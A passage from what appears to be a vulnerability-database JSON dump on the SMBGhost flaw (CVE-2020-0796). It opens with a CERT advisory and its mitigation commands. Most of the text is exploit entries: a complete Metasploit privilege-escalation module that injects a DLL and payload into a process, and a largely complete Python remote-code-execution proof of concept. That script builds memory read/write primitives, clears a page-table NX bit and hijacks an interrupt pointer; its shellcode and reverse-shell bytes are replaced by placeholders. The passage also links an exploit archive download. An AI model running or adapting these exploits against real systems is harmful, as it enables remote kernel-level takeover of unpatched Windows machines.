"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-01-18T00:00:00", "id": "KLA11693", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11693/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2021-09-28T17:49:57", "description": "### Overview\n\nMicrosoft SMBv3 contains a vulnerability in the handling of compression, which may allow a remote, 
unauthenticated attacker to execute arbitrary code on a vulnerable system. This vulnerability is being referred to as \"SMBGhost and CoronaBlue.\"\n\n### Description\n\nMicrosoft Server Message Block 3.1.1 (SMBv3) contains a vulnerability in the way that it handles connections that use compression. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. It has been reported that this vulnerability is \"wormable.\"\n\n### Impact\n\nBy connecting to a vulnerable Windows machine using SMBv3, or by causing a vulnerable Windows system to initiate a client connection to a SMBv3 server, a remote, unauthenticated attacker may be able to execute arbitrary code with SYSTEM privileges on a vulnerable system.\n\n### Solution\n\n**Apply an update**\n\nThis issue has been addressed in the [Microsoft update for CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>). Please also consider the following workarounds:\n\n**Disable SMBv3 compression** \n \nAccording to [Microsoft Security Advisory ADV200005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005>) :\n\n \n_You can disable compression to block unauthenticated attackers from exploiting the vulnerability against an SMBv3 Server with the PowerShell command below._ \n \n`Set-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\" DisableCompression -Type DWORD -Value 1 -Force` \n \n_Notes:_ \n \n1\\. _No reboot is needed after making the change._ \n2\\. 
_This workaround does not prevent exploitation of SMB clients._ \n \n_You can disable the workaround with the PowerShell command below._ \n \n`_Set-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\" DisableCompression -Type DWORD -Value 0 -Force_` \n**Block inbound and outbound SMB** \n \nConsider blocking outbound SMB connections (TCP port 445 for SMBv3) from the local network to the WAN. Also ensure that SMB connections from the internet are not allowed to connect inbound to an enterprise LAN.\n\n### Acknowledgements\n\nThis document was written by Will Dormann.\n\n### Vendor Information\n\n872016\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Microsoft Affected\n\nUpdated: 2020-06-19 **CVE-2020-0796**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 7.8 | E:POC/RL:OF/RC:C \nEnvironmental | 7.8 | CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References\n\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2020-0796 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2020-0796>) \n---|--- \n**Date Public:** | 2020-03-10 \n**Date First Published:** | 2020-03-11 \n**Date Last Updated: ** | 2020-06-04 21:26 UTC \n**Document Revision: ** | 28 \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-11T00:00:00", "type": "cert", "title": "Microsoft SMBv3 compression remote code execution vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-06-04T21:26:00", "id": "VU:872016", "href": "https://www.kb.cert.org/vuls/id/872016", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-18T23:40:46", "description": "A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to execute code on a vulnerable server. 
This local exploit implementation leverages this flaw to elevate itself before injecting a payload into winlogon.exe.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-04-06T00:00:00", "type": "zdt", "title": "Microsoft Server Message Block 3.1.1 (SMBv3) Compression Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-04-06T00:00:00", "id": "1337DAY-ID-34206", "href": "https://0day.today/exploit/description/34206", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n include Msf::Exploit::Remote::AutoCheck\n\n def initialize(info={})\n super(update_info(info, {\n 'Name' => 'SMBv3 Compression Buffer Overflow',\n 'Description' => %q{\n A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol 
that can be leveraged to\n execute code on a vulnerable server. This local exploit implementation leverages this flaw to elevate itself\n before injecting a payload into winlogon.exe.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Daniel Garc\u00eda Guti\u00e9rrez', # original LPE exploit\n 'Manuel Blanco Paraj\u00f3n', # original LPE exploit\n 'Spencer McIntyre' # metasploit module\n ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Targets' =>\n [\n #[ 'Windows 10 x86', { 'Arch' => ARCH_X86 } ],\n [ 'Windows 10 v1903-1909 x64', { 'Arch' => ARCH_X64 } ]\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'References' =>\n [\n [ 'CVE', '2020-0796' ],\n [ 'URL', 'https://github.com/danigargu/CVE-2020-0796' ],\n [ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005' ]\n ],\n 'DisclosureDate' => '2020-03-13',\n 'DefaultTarget' => 0,\n 'AKA' => [ 'SMBGhost', 'CoronaBlue' ],\n 'Notes' =>\n {\n 'Stability' => [ CRASH_OS_RESTARTS, ],\n 'Reliability' => [ REPEATABLE_SESSION, ],\n },\n }))\n end\n\n def check\n sysinfo_value = sysinfo[\"OS\"]\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return Exploit::CheckCode::Safe\n end\n\n build_num = sysinfo_value.match(/\\w+\\d+\\w+(\\d+)/)[0].to_i\n vprint_status(\"Windows Build Number = #{build_num}\")\n # see https://docs.microsoft.com/en-us/windows/release-information/\n unless sysinfo_value =~ /10/ && (build_num >= 18362 && build_num <= 18363)\n print_error('The exploit only supports Windows 10 versions 1903 - 1909')\n return CheckCode::Safe\n end\n\n disable_compression = registry_getvaldata(\"HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\LanmanServer\\\\Parameters\",\"DisableCompression\")\n if !disable_compression.nil? 
&& disable_compression != 0\n print_error('The exploit requires compression to be enabled')\n return CheckCode::Safe\n end\n\n CheckCode::Appears\n end\n\n def exploit\n # NOTE: Automatic check is implemented by the AutoCheck mixin\n super\n\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if sysinfo[\"Architecture\"] =~ /wow64/i\n fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')\n elsif sysinfo[\"Architecture\"] == ARCH_X64 && target.arch.first == ARCH_X86\n fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')\n elsif sysinfo[\"Architecture\"] == ARCH_X86 && target.arch.first == ARCH_X64\n fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')\n end\n\n print_status('Launching notepad to host the exploit...')\n notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})\n begin\n process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{process.pid} launched.\")\n rescue Rex::Post::Meterpreter::RequestError\n # Reader Sandbox won't allow to create a new process:\n # stdapi_sys_process_execute: Operation failed: Access is denied.\n print_error('Operation failed. Trying to elevate the current process...')\n process = client.sys.process.open\n end\n\n print_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\")\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0796', 'CVE-2020-0796.x64.dll')\n library_path = ::File.expand_path(library_path)\n\n print_status(\"Injecting exploit into #{process.pid}...\")\n exploit_mem, offset = inject_dll_into_process(process, library_path)\n\n print_status(\"Exploit injected. 
Injecting payload into #{process.pid}...\")\n encoded_payload = payload.encoded\n payload_mem = inject_into_process(process, [encoded_payload.length].pack('I<') + encoded_payload)\n\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation.\n print_status('Payload injected. Executing exploit...')\n process.thread.create(exploit_mem + offset, payload_mem)\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n end\nend\n", "sourceHref": "https://0day.today/exploit/34206", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-25T11:21:29", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-06-02T00:00:00", "type": "zdt", "title": "Microsoft Windows - (SMBGhost) Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-06-02T00:00:00", "id": "1337DAY-ID-34504", "href": "https://0day.today/exploit/description/34504", "sourceData": "#!/usr/bin/env python\n'''\n# EDB Note ~ Download: 
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48537.zip\n\n# SMBGhost_RCE_PoC\n\nRCE PoC for CVE-2020-0796 \"SMBGhost\"\n\nFor demonstration purposes only! Only use this a reference. Seriously. This has not been tested outside of my lab environment. It was written quickly and needs some work to be more reliable. Sometimes you BSOD. Using this for any purpose other than self education is an extremely bad idea. Your computer will burst in flames. Puppies will die. \n\nNow that that's out of the way....\n\nUsage ex: \n\n``` \n$SMBGhost_RCE_PoC python exploit.py -ip 192.168.142.131\n[+] found low stub at phys addr 13000!\n[+] PML4 at 1ad000\n[+] base of HAL heap at fffff79480000000\n[+] ntoskrnl entry at fffff80645792010\n[+] found PML4 self-ref entry 1eb\n[+] found HalpInterruptController at fffff79480001478\n[+] found HalpApicRequestInterrupt at fffff80645cb3bb0\n[+] built shellcode!\n[+] KUSER_SHARED_DATA PTE at fffff5fbc0000000\n[+] KUSER_SHARED_DATA PTE NX bit cleared!\n[+] Wrote shellcode at fffff78000000a00!\n[+] Press a key to execute shellcode!\n[+] overwrote HalpInterruptController pointer, should have execution shortly...\n```\n\nReplace payload in USER_PAYLOAD in exploit.py. Max of 600 bytes. If you want more, modify the kernel shell code yourself. \n\nlznt1 code from [here](https://github.com/you0708/lznt1). 
Modified to add a \"bad compression\" function to corrupt SRVNET buffer\nheader without causing a crash.\n\nSee this excellent write up by Ricera Security for more details on the methods I used: \nhttps://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html\n'''\n\nimport sys\nimport socket\nimport struct\nimport argparse\n\nfrom lznt1 import compress, compress_evil\nfrom smb_win import smb_negotiate, smb_compress\n\n# Use lowstub jmp bytes to signature search\nLOWSTUB_JMP = 0x1000600E9\n# Offset of PML4 pointer in lowstub\nPML4_LOWSTUB_OFFSET = 0xA0\n# Offset of lowstub virtual address in lowstub\nSELFVA_LOWSTUB_OFFSET = 0x78\n# Offset of NTOSKRNL entry address in lowstub\nNTENTRY_LOWSTUB_OFFSET = 0x278\n\n# Offset of hal!HalpApicRequestInterrupt pointer in hal!HalpInterruptController\nHALP_APIC_REQ_INTERRUPT_OFFSET = 0x78\n\nKUSER_SHARED_DATA = 0xFFFFF78000000000\n\n# Offset of pNetRawBuffer in SRVNET_BUFFER_HDR\nPNET_RAW_BUFF_OFFSET = 0x18\n# Offset of pMDL1 in SRVNET_BUFFER_HDR\nPMDL1_OFFSET = 0x38\n\n# Shellcode from kernel_shellcode.asm\n\nKERNEL_SHELLCODE = b\"\"  # PLACEHOLDER: kernel shellcode byte blob removed from this record\n\n# Reverse shell generated by msfvenom. Can you believe I had to download Kali Linux for this shit?\n\nUSER_PAYLOAD = b\"\"  # PLACEHOLDER: msfvenom reverse-shell payload bytes removed from this record\n\n\nPML4_SELFREF = 0\nPHAL_HEAP = 0\nPHALP_INTERRUPT = 0\nPHALP_APIC_INTERRUPT = 0\nPNT_ENTRY = 0\n\nmax_read_retry = 3\noverflow_val = 0x1100\nwrite_unit = 0xd0\npmdl_va = KUSER_SHARED_DATA + 0x900\npmdl_mapva = KUSER_SHARED_DATA + 0x800\npshellcodeva = KUSER_SHARED_DATA + 0xa00\n\n\nclass MDL:\n def __init__(self, map_va, phys_addr):\n self.next = struct.pack(\"<Q\", 0x0)\n self.size = struct.pack(\"<H\", 0x40)\n self.mdl_flags = struct.pack(\"<H\", 0x5004)\n self.alloc_processor = struct.pack(\"<H\", 0x0)\n self.reserved = struct.pack(\"<H\", 0x0)\n self.process = struct.pack(\"<Q\", 0x0)\n self.map_va = struct.pack(\"<Q\", map_va)\n map_va &= ~0xFFF\n self.start_va = struct.pack(\"<Q\", map_va)\n self.byte_count = 
struct.pack(\"<L\", 0x1100)\n self.byte_offset = struct.pack(\"<L\", (phys_addr & 0xFFF) + 0x4)\n phys_addr_enc = (phys_addr & 0xFFFFFFFFFFFFF000) >> 12\n self.phys_addr1 = struct.pack(\"<Q\", phys_addr_enc)\n self.phys_addr2 = struct.pack(\"<Q\", phys_addr_enc)\n self.phys_addr3 = struct.pack(\"<Q\", phys_addr_enc)\n\n def raw_bytes(self):\n mdl_bytes = self.next + self.size + self.mdl_flags + \\\n self.alloc_processor + self.reserved + self.process + \\\n self.map_va + self.start_va + self.byte_count + \\\n self.byte_offset + self.phys_addr1 + self.phys_addr2 + \\\n self.phys_addr3\n return mdl_bytes\n\n\ndef reconnect(ip, port):\n sock = socket.socket(socket.AF_INET)\n sock.settimeout(7)\n sock.connect((ip, port))\n return sock\n\n\ndef write_primitive(ip, port, data, addr):\n sock = reconnect(ip, port)\n smb_negotiate(sock)\n sock.recv(1000)\n uncompressed_data = b\"\\x41\"*(overflow_val - len(data))\n uncompressed_data += b\"\\x00\"*PNET_RAW_BUFF_OFFSET\n uncompressed_data += struct.pack('<Q', addr)\n compressed_data = compress(uncompressed_data)\n smb_compress(sock, compressed_data, 0xFFFFFFFF, data)\n sock.close()\n\n\ndef write_srvnet_buffer_hdr(ip, port, data, offset):\n sock = reconnect(ip, port)\n smb_negotiate(sock)\n sock.recv(1000)\n compressed_data = compress_evil(data)\n dummy_data = b\"\\x33\"*(overflow_val + offset)\n smb_compress(sock, compressed_data, 0xFFFFEFFF, dummy_data)\n sock.close()\n\n\ndef read_physmem_primitive(ip, port, phys_addr):\n i = 0\n while i < max_read_retry:\n i += 1\n buff = try_read_physmem_primitive(ip, port, phys_addr)\n if buff is not None:\n return buff\n\n\ndef try_read_physmem_primitive(ip, port, phys_addr):\n fake_mdl = MDL(pmdl_mapva, phys_addr).raw_bytes()\n write_primitive(ip, port, fake_mdl, pmdl_va)\n write_srvnet_buffer_hdr(ip, port, struct.pack('<Q', pmdl_va), PMDL1_OFFSET)\n\n i = 0\n while i < max_read_retry:\n i += 1\n sock = reconnect(ip, port)\n smb_negotiate(sock)\n buff = sock.recv(1000)\n 
sock.close()\n if buff[4:8] != b\"\\xfeSMB\":\n return buff\n\n\ndef get_phys_addr(ip, port, va_addr):\n pml4_index = (((1 << 9) - 1) & (va_addr >> (40 - 1)))\n pdpt_index = (((1 << 9) - 1) & (va_addr >> (31 - 1)))\n pdt_index = (((1 << 9) - 1) & (va_addr >> (22 - 1)))\n pt_index = (((1 << 9) - 1) & (va_addr >> (13 - 1)))\n\n pml4e = PML4 + pml4_index*0x8\n pdpt_buff = read_physmem_primitive(ip, port, pml4e)\n\n if pdpt_buff is None:\n sys.exit(\"[-] physical read primitive failed\")\n\n pdpt = struct.unpack(\"<Q\", pdpt_buff[0:8])[0] & 0xFFFFF000\n pdpte = pdpt + pdpt_index*0x8\n pdt_buff = read_physmem_primitive(ip, port, pdpte)\n\n if pdt_buff is None:\n sys.exit(\"[-] physical read primitive failed\")\n\n pdt = struct.unpack(\"<Q\", pdt_buff[0:8])[0] & 0xFFFFF000\n pdte = pdt + pdt_index*0x8\n pt_buff = read_physmem_primitive(ip, port, pdte)\n\n if pt_buff is None:\n sys.exit(\"[-] physical read primitive failed\")\n\n pt = struct.unpack(\"<Q\", pt_buff[0:8])[0]\n \n if pt & (1 << (8 - 1)):\n phys_addr = (pt & 0xFFFFF000) + (pt_index & 0xFFF)*0x1000 + (va_addr & 0xFFF)\n return phys_addr\n else:\n pt = pt & 0xFFFFF000\n\n pte = pt + pt_index*0x8\n pte_buff = read_physmem_primitive(ip, port, pte)\n\n if pte_buff is None:\n sys.exit(\"[-] physical read primitive failed\")\n\n phys_addr = (struct.unpack(\"<Q\", pte_buff[0:8])[0] & 0xFFFFF000) + \\\n (va_addr & 0xFFF)\n\n return phys_addr\n\n\ndef get_pte_va(addr):\n pt = addr >> 9\n lb = (0xFFFF << 48) | (PML4_SELFREF << 39)\n ub = ((0xFFFF << 48) | (PML4_SELFREF << 39) +\n 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8\n pt = pt | lb\n pt = pt & ub\n\n return pt\n\n\ndef overwrite_pte(ip, port, addr):\n phys_addr = get_phys_addr(ip, port, addr)\n\n buff = read_physmem_primitive(ip, port, phys_addr)\n\n if buff is None:\n sys.exit(\"[-] read primitive failed!\")\n\n pte_val = struct.unpack(\"<Q\", buff[0:8])[0]\n\n # Clear NX bit\n overwrite_val = pte_val & (((1 << 63) - 1))\n overwrite_buff = struct.pack(\"<Q\", 
overwrite_val)\n\n write_primitive(ip, port, overwrite_buff, addr)\n\n\ndef build_shellcode():\n global KERNEL_SHELLCODE\n KERNEL_SHELLCODE += struct.pack(\"<Q\", PHALP_INTERRUPT +\n HALP_APIC_REQ_INTERRUPT_OFFSET)\n KERNEL_SHELLCODE += struct.pack(\"<Q\", PHALP_APIC_INTERRUPT)\n KERNEL_SHELLCODE += struct.pack(\"<Q\", PNT_ENTRY & 0xFFFFFFFFFFFFF000)\n KERNEL_SHELLCODE += USER_PAYLOAD\n\n\ndef search_hal_heap(ip, port):\n global PHALP_INTERRUPT\n global PHALP_APIC_INTERRUPT\n search_len = 0x10000\n\n index = PHAL_HEAP\n page_index = PHAL_HEAP\n cons = 0\n phys_addr = 0\n\n while index < PHAL_HEAP + search_len:\n\n # It seems that pages in the HAL heap are not necessarily contiguous in physical memory, \n # so we try to reduce number of reads like this \n \n if not (index & 0xFFF):\n phys_addr = get_phys_addr(ip, port, index)\n else:\n phys_addr = (phys_addr & 0xFFFFFFFFFFFFF000) + (index & 0xFFF)\n\n buff = read_physmem_primitive(ip, port, phys_addr)\n\n if buff is None:\n sys.exit(\"[-] physical read primitive failed!\")\n\n entry_indices = 8*(((len(buff) + 8 // 2) // 8) - 1)\n i = 0\n \n # This heuristic seems to be OK to find HalpInterruptController, but could use improvement\n while i < entry_indices:\n entry = struct.unpack(\"<Q\", buff[i:i+8])[0]\n i += 8\n if (entry & 0xFFFFFF0000000000) != 0xFFFFF80000000000:\n cons = 0\n continue\n cons += 1\n if cons > 3:\n PHALP_INTERRUPT = index + i - 0x40\n print(\"[+] found HalpInterruptController at %lx\"\n % PHALP_INTERRUPT)\n\n if len(buff) < i + 0x40:\n buff = read_physmem_primitive(ip, port, index + i + 0x38)\n PHALP_APIC_INTERRUPT = struct.unpack(\"<Q\", buff[0:8])[0]\n \n if buff is None:\n sys.exit(\"[-] physical read primitive failed!\")\n else:\n PHALP_APIC_INTERRUPT = struct.unpack(\"<Q\",buff[i + 0x38:i+0x40])[0]\n \n print(\"[+] found HalpApicRequestInterrupt at %lx\" % PHALP_APIC_INTERRUPT)\n \n return\n index += entry_indices\n\n sys.exit(\"[-] failed to find HalpInterruptController!\")\n\n\ndef 
search_selfref(ip, port):\n search_len = 0x1000\n index = PML4\n\n while search_len:\n buff = read_physmem_primitive(ip, port, index)\n if buff is None:\n return\n entry_indices = 8*(((len(buff) + 8 // 2) // 8) - 1)\n i = 0\n while i < entry_indices:\n entry = struct.unpack(\"<Q\",buff[i:i+8])[0] & 0xFFFFF000\n if entry == PML4:\n return index + i\n i += 8\n search_len -= entry_indices\n index += entry_indices\n\n\ndef find_pml4_selfref(ip, port):\n global PML4_SELFREF\n self_ref = search_selfref(ip, port)\n\n if self_ref is None:\n sys.exit(\"[-] failed to find PML4 self reference entry!\")\n\n PML4_SELFREF = (self_ref & 0xFFF) >> 3\n\n print(\"[+] found PML4 self-ref entry %0x\" % PML4_SELFREF)\n\n\ndef find_low_stub(ip, port):\n global PML4\n global PHAL_HEAP\n global PNT_ENTRY\n\n limit = 0x100000\n index = 0x1000\n\n while index < limit:\n buff = read_physmem_primitive(ip, port, index)\n\n if buff is None:\n sys.exit(\"[-] physical read primitive failed!\")\n\n entry = struct.unpack(\"<Q\", buff[0:8])[0] & 0xFFFFFFFFFFFF00FF\n\n if entry == LOWSTUB_JMP:\n print(\"[+] found low stub at phys addr %lx!\" % index)\n PML4 = struct.unpack(\"<Q\", buff[PML4_LOWSTUB_OFFSET: PML4_LOWSTUB_OFFSET + 8])[0]\n print(\"[+] PML4 at %lx\" % PML4)\n PHAL_HEAP = struct.unpack(\"<Q\", buff[SELFVA_LOWSTUB_OFFSET:SELFVA_LOWSTUB_OFFSET + 8])[0] & 0xFFFFFFFFF0000000\n print(\"[+] base of HAL heap at %lx\" % PHAL_HEAP)\n\n buff = read_physmem_primitive(ip, port, index + NTENTRY_LOWSTUB_OFFSET)\n\n if buff is None:\n sys.exit(\"[-] physical read primitive failed!\")\n\n PNT_ENTRY = struct.unpack(\"<Q\", buff[0:8])[0]\n print(\"[+] ntoskrnl entry at %lx\" % PNT_ENTRY)\n return\n\n index += 0x1000\n\n sys.exit(\"[-] Failed to find low stub in physical memory!\")\n\n\ndef do_rce(ip, port):\n find_low_stub(ip, port)\n find_pml4_selfref(ip, port)\n search_hal_heap(ip, port)\n \n build_shellcode()\n\n print(\"[+] built shellcode!\")\n\n pKernelUserSharedPTE = get_pte_va(KUSER_SHARED_DATA)\n 
print(\"[+] KUSER_SHARED_DATA PTE at %lx\" % pKernelUserSharedPTE)\n\n overwrite_pte(ip, port, pKernelUserSharedPTE)\n print(\"[+] KUSER_SHARED_DATA PTE NX bit cleared!\")\n \n # TODO: figure out why we can't write the entire shellcode data at once. There is a check before srv2!Srv2DecompressData preventing the call of the function.\n to_write = len(KERNEL_SHELLCODE)\n write_bytes = 0\n while write_bytes < to_write:\n write_sz = min([write_unit, to_write - write_bytes])\n write_primitive(ip, port, KERNEL_SHELLCODE[write_bytes:write_bytes + write_sz], pshellcodeva + write_bytes)\n write_bytes += write_sz\n \n print(\"[+] Wrote shellcode at %lx!\" % pshellcodeva)\n\n input(\"[+] Press a key to execute shellcode!\")\n \n write_primitive(ip, port, struct.pack(\"<Q\", pshellcodeva), PHALP_INTERRUPT + HALP_APIC_REQ_INTERRUPT_OFFSET)\n print(\"[+] overwrote HalpInterruptController pointer, should have execution shortly...\")\n \n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-ip\", help=\"IP address of target\", required=True)\n parser.add_argument(\"-p\", \"--port\", default=445, help=\"SMB port, \\\n default: 445\", required=False, type=int)\n args = parser.parse_args()\n\n do_rce(args.ip, args.port)\n", "sourceHref": "https://0day.today/exploit/34504", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-23T01:30:21", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-30T00:00:00", "type": "zdt", "title": "Microsoft Windows 10 (1903/1909) - (SMBGhost) SMB3.1.1 Local Privilege 
Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-30T00:00:00", "id": "1337DAY-ID-34171", "href": "https://0day.today/exploit/description/34171", "sourceData": "Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation\n\n# CVE-2020-0796\n\nWindows SMBv3 LPE Exploit\n\n\n\n## Authors\n\n * Daniel Garc\u00eda Guti\u00e9rrez ([@danigargu](https://twitter.com/danigargu))\n * Manuel Blanco Paraj\u00f3n ([@dialluvioso_](https://twitter.com/dialluvioso_))\n\n## References\n\n* https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796\n* https://www.synacktiv.com/posts/exploit/im-smbghost-daba-dee-daba-da.html\n* https://www.fortinet.com/blog/threat-research/cve-2020-0796-memory-corruption-vulnerability-in-windows-10-smb-server.html#.Xndfn0lv150.twitter\n* https://www.mcafee.com/blogs/other-blogs/mcafee-labs/smbghost-analysis-of-cve-2020-0796/\n* http://blogs.360.cn/post/CVE-2020-0796.html\n* https://blog.zecops.com/vulnerabilities/vulnerability-reproduction-cve-2020-0796-poc/\n\n\nDownload ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48267.zip\n", "sourceHref": "https://0day.today/exploit/34171", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-10T00:00:00", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": 
